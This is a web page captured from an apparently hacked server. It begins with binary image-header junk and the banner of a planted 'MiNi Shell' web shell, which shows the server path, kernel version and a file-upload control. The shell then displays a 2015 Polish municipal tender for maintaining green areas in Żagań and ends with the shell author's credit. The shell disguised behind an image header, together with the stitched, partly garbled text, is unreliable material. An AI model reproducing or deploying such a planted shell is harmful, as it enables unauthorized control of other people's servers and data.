JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150414/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150414/84432-N-2015.html

<p class="kh_header"><b>Żagań: BIEŻĄCE UTRZYMANIE I KONSERWACJA ZIELENI MIEJSKIEJ W ŻAGANIU NA OKRES JEDNEGO ROKU</b><br>
<b>Numer ogłoszenia: 84432 - 2015; data zamieszczenia: 14.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BIEŻĄCE UTRZYMANIE I KONSERWACJA ZIELENI MIEJSKIEJ W ŻAGANIU NA OKRES JEDNEGO ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie bieżącego utrzymania i konserwacji terenów zieleni stanowiących własność Gminy Żagań o statusie miejskim,  w okresie od zawarcia umowy przez okres jednego  roku. 
Zakres prac przewidzianych  do wykonania  obejmować  będzie  w szczególności :
 1) prześwietlanie i cięcie pielęgnacyjne drzew,
 2) oczyszczanie drzew z odrostów,
 3) wycinka suchych i chorych drzew i krzewów,                        
 4) odmładzanie skupin krzewów,
 5) usuwanie wiatrołomów,
 6) zakup, ustawienie i dekoracja choinek w okresie świątecznym,
 7) dokarmianie ptactwa wodnego w okresie zimowym,
 8) grabienie liści,
 9) odtwarzanie pasów zieleni,
10) odtwarzanie alejek parkowych i ścieżek na terenach parków miejskich  i zieleńców,
11) nasadzenia w gazonach i rabatach ( kwiatów, krzewów i drzew), 
12) pielenie, nawożenie i podlewanie rabat i gazonów, 
13) oczyszczanie, przekopanie i spulchnianie ziemi na rabatach z roślinami wieloletnimi i 
     na gazonach,
14) zakup sadzonek drzew i krzewów oraz wykonywanie nasadzeń, 
15) zakładanie nowych trawników oraz koszenie trawników.
16) nawożenie, usuwanie chwastów, przycinanie i kształtowanie żywopłotów,
17) zbieranie i usuwanie: skoszonych traw, zebranych liści, ściętych żywopłotów,  gałęzi i
     innych zanieczyszczeń z terenów zielonych,
18) konserwacja i uzupełnianie ławek parkowych i pojemników na odpady (koszy)  
     zlokalizowanych na terenach zielonych,
 19) zabezpieczenie roślin wieloletnich przed sezonem zimowym.

Powierzchnia terenów zieleni stanowiącej własność Gminy Żagań o statusie miejskim wynosi około 37 ha. 

3.2. Ponadto Wykonawca jest zobowiązany do : 
   1) prowadzenia prac związanych  z utrzymaniem i  konserwacją  zieleni zlokalizowanej : 
      a) w lesie komunalnym,  
      b)  w pasie drogowym dróg gminnych w Żaganiu.
  2) opracowywania propozycji miesięcznych zakresów robót, w terminie do 25 dnia miesiąca 
      poprzedzającego dany miesiąc  wraz z opracowaniem wstępnej kalkulacji typowanych 
      prac. 
      Zamawiający będzie zatwierdzał opracowany przez Wykonawcę zakres prac (przed 
      rozpoczęciem nowego miesiąca), obejmujący kolejność, zakres i wartość robót wraz z 
      terminem ich wykonania (typowanie robót); 
      Realizacja robót  prowadzona będzie zgodnie ze sztuką ogrodniczą,  obowiązującymi 
      Przepisami w tym zakresie,  polskimi normami,  zasadami wiedzy  technicznej, należytą 
      starannością, przepisami BHP, dobrze jakościowo i estetycznie. 

3.3. Dodatkowe informacje związane z realizacją  przedmiotu zamówienia:   
  1) zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną  
       ofertową obejmuje również: 
     a) organizację, zagospodarowanie i utrzymanie zaplecza robót,
     b) ponoszenie kosztów zakupu, załadunku, rozładunku i składowania materiałów  
         niezbędnych do wykonania prac objętych zamówieniem,
     c) zapewnienie sprzętu wraz z obsługą, materiałami pędnymi i  eksploatacyjnymi, 
         niezbędnego do bieżącego utrzymania i konserwacji zieleni, 
     d) koszt ubezpieczeń, podatków, koszty działalności Wykonawcy;  
 2) wykonawca w oparciu o podane w ofercie składniki cenotwórcze opracuje kosztorys 
     ofertowy zawierający ceny jednostkowe na wykonanie poszczególnych rodzajów robót 
     (który stanowić będą załącznik do umowy). Do prowadzenia rozliczeń za wykonane prace 
     przyjmowane będą ceny jednostkowe  ujęte w kosztorysie ofertowym,  stanowiącym 
     załącznik do oferty złożonej w zamówieniu publicznym. 
     Rozliczenie za  wykonanie potwierdzonego przez Zamawiającego zakresu prac  
     następować będzie w okresach miesięcznych. 
     Za prace, na które uzgodniono ceny jednostkowe, wynagrodzenie stanowić będzie  
     iloczyn ilości rzeczywiście wykonanych prac, potwierdzonych przez Zamawiającego  i cen 
     jednostkowych określonych w kosztorysie ofertowym  plus ewentualny koszt materiałów i 
      podatek VAT;
 4)  za prace  nie  objęte zamówieniem  podstawowym i nie przekraczające łącznie 50% 
      wartości realizowanego zamówienia o którym mowa w art.67 ust.1 pkt.5 ustawy Prawo 
      zamówień publicznych( zamówieniu dodatkowym), niezbędne do jego prawidłowego 
      wykonania,  których wykonanie stało się konieczne na skutek sytuacji niemożliwej 
      wcześniej do  przewidzenia, jeżeli z  przyczyn technicznych lub gospodarczych 
      oddzielenie zamówienia  dodatkowego od zamówienia podstawowego wymagałoby 
      poniesienia niewspółmiernie wysokich kosztów lub wykonanie zamówienia 
      podstawowego jest uzależnione od zamówienia dodatkowego, wynagrodzenie ustalone 
      będzie w oparciu  o składniki  cenotwórcze przedstawione w  formularzu ofertowym;  
 5) koszty pracy  sprzętu nie ujętego w kosztorysie rozliczane będą wg obowiązujących    
      średnich  cen SEKOCENBUDU lub wg kalkulacji własnej sprzętu, lecz ceny te nie mogą 
      być wyższe od średnich cen SEKOCENBUDU  bądź cen  podmiotów wynajmujących  
      odpowiedni sprzęt na rynku lokalnym;
 6) Wykonawca będzie ponosił pełną odpowiedzialność za należyte wykonanie przedmiotu 
      zamówienia, zgodnie z zakresem robót (czynności do wykonania), lokalizacją, a także 
      terminem ich realizacji,  określonymi w protokole typowania robót.
 7) Wykonawca, z którym zostanie zawarta umowa o wykonanie przedmiotu zamówienia 
      jest  zobowiązany  przed zawarciem umowy  przedłożyć Zamawiającemu do wglądu 
      stosowny dokument odnośnie sposobu gospodarowania zebranymi  odpadami 
      komunalnymi / np. umowa z  operatorem prowadzącym działalność w zakresie 
      odbierania odpadów  komunalnych, bądź w zakresie gospodarowania odpadami,  
      ewentualnie odpowiednie  zezwolenie  w zakresie gospodarki odpadami/.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.34.00.00-5, 77.21.41.00-5, 77.31.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania  określonej  działalności lub czynności, Zamawiający nie stawia żadnych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten  wymóg tego Wykonawcę,  który w okresie ostatnich trzech  lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wykonał  co   najmniej 1 usługę  polegającą na bieżącym utrzymaniu, konserwacji terenów  zieleni o wartości nie mniejszej  jak 250 000 zł.  Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     Na potwierdzenie spełnienia tego  warunku Wykonawca złoży wraz z  ofertą wykaz wykonanych głównych  usług,  w okresie ostatnich trzech lat przed upływem składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wraz z  podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy usługi  ujęte w wykazie usług  głównych zostały wykonane należycie, czy też  zostały  wykonane nienależycie.  
     Za główną usługę Zamawiający uznaje : usługę  polegającą na bieżącym utrzymaniu, 
     konserwacji terenów  zieleni. 
     Dowodami  są poświadczenia wystawione przez  podmiot, na rzecz którego Wykonawca 
     świadczył usługę, z tym , że  poświadczenie  w odniesieniu do nadal wykonywanych 
     usług okresowych lub ciągłych powinno być wydane nie wcześniej niż na 3 miesiące 
     przed upływem terminu składania ofert.   
     W przypadku gdy Zamawiający jest podmiotem na rzecz którego usługi  wskazane w 
     wykazie, zostały wcześniej wykonane, a w stosunku do których Zamawiający żąda 
     poświadczeń,  Wykonawca nie ma obowiązku przedkładania  dowodów- poświadczeń. 
     Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od 
     charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
     obowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  zasobami  w 
     trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne 
     zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 
     zasobów na potrzeby  wykonania zamówienia. 
     Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
     wykonawcą za szkodę  zamawiającego powstałą wskutek nieudostępnienia tych 
     zasobów, chyba że za nieudostępnienie zasobów nie ponosi  winy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie dysponowania odpowiednim potencjałem technicznym  Zamawiający uzna za spełniającego te wymogi  tego Wykonawcę, który : 
a)	będzie dysponował  sprzętem niezbędnym do wykonania przymiotu zamówienia :
samochodem  dostawczym do  0,9 t , ciągnikiem kołowym, samochód dostawczy  do  3,5 t., piłą  motorową  łańcuchową,  kosiarką  spalinową,  wykaszarką   do skarp.  Na potwierdzenie spełnienia tego warunku Wykonawca złoży dokument określony w 
         punkcie 6.1 podpunkt  4 SIWZ . Wykonawcy występujący  wspólnie  powyższy 
         warunek mogą spełnić łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie dysponowania osobami zdolnymi do   wykonania zamówienia,  Zamawiający uzna za spełniającego te wymogi  tego 
     Wykonawcę, który : będzie dysponował  co najmniej jedną osobą,  która ukończyła kurs lub  szkolenie  albo  
        inną formę kształcenia zawodowego z zakresu  gospodarza zieleni lub posiada tytuł 
        zawodowy mistrza ogrodnika, albo posiada inne uprawnieni predysponujące ją do  
        wykonywania prac z zakresu  utrzymania i konserwacji  zieleni miejskiej np. 
        wykształcenie ogrodnicze, leśne,  architektura krajobrazu. Na  potwierdzenie spełnienia 
        tego warunku Wykonawca złoży  dokument  określony w  punkcie 6.1 podpunkt 3 
        SIWZ. Wykonawcy występujący  wspólnie  powyższy warunek mogą spełnić łącznie.  
    Na potwierdzenie spełnienia w/w warunków Wykonawca złoży wykaz potencjału 
    technicznego i wykaz potencjału osobowego dostępnego Wykonawcy  w celu wykonania 
    zamówienia  wraz z informacją o podstawie dysponowania  tymi zasobami. 
    W  tym zakresie  Wykonawca może polegać na  zasobach innych  podmiotów, niezależnie 
    od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji 
    zobowiązany jest  udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w 
    trakcie  realizacji zamówienia, w  szczególności przedstawiając w tym celu pisemne 
    zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych zasobów 
    na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do 
    udostępnienia zasobów odpowiada solidarnie  z wykonawcą za szkodę 
    zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za 
    nieudostępnienie zasobów nie ponosi winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie sytuacji ekonomicznej i finansowej,  Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który jest ubezpieczony  od odpowiedzialności cywilnej  w 
     zakresie prowadzonej działalności gospodarczej związanej z przedmiotem  zamówienia i 
     na potwierdzenie  spełnienia tego warunku złoży wraz z ofertą dokument określony w 
     punkcie 6.1. podpunkt 5 SIWZ,  a w przypadku  braku tego  dokumentu  inny dokument 
     potwierdzający, że  Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w  zakresie prowadzonej działalności  związanej z   przedmiotem zamówienia.  Wykonawcy występujący wspólnie  powyższy warunek mogą  spełnić łącznie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główną usługę Zamawiający uznaje : usługę  polegającą na bieżącym utrzymaniu, konserwacji terenów  zieleni.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Kryterium Środowiskowe - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień publicznych dopuszcza możliwość   zmian postanowień zawartej umowy w stosunku do treści oferty  na podstawie, której dokonano wyboru Wykonawcy w następującym zakresie i na określonych niżej warunkach : 
1) w zakresie zmiany powierzchni jak i ilości obiektów zieleni miejskiej określonej w załączniku do umowy. 
2) w zakresie zmiany  wysokości wynagrodzenia  ze względu na zmianę  stawki podatku od towarów i  usług VAT wynikającą ze zmiany przepisów podatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl         http://www.bip.zagan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żagań,  Wydział Zamówień Publicznych i Nadzoru Właścicielskiego plac Słowiański 17, 68-100 Żagań, na pisemny wniosek Wykonawcy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2015 godzina 11:00, miejsce: Urząd Miasta Żagań, Wydział Zamówień Publicznych i Nadzoru Właścicielskiego plac Słowiański 17, pok. nr 26,  68-100 Żagań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com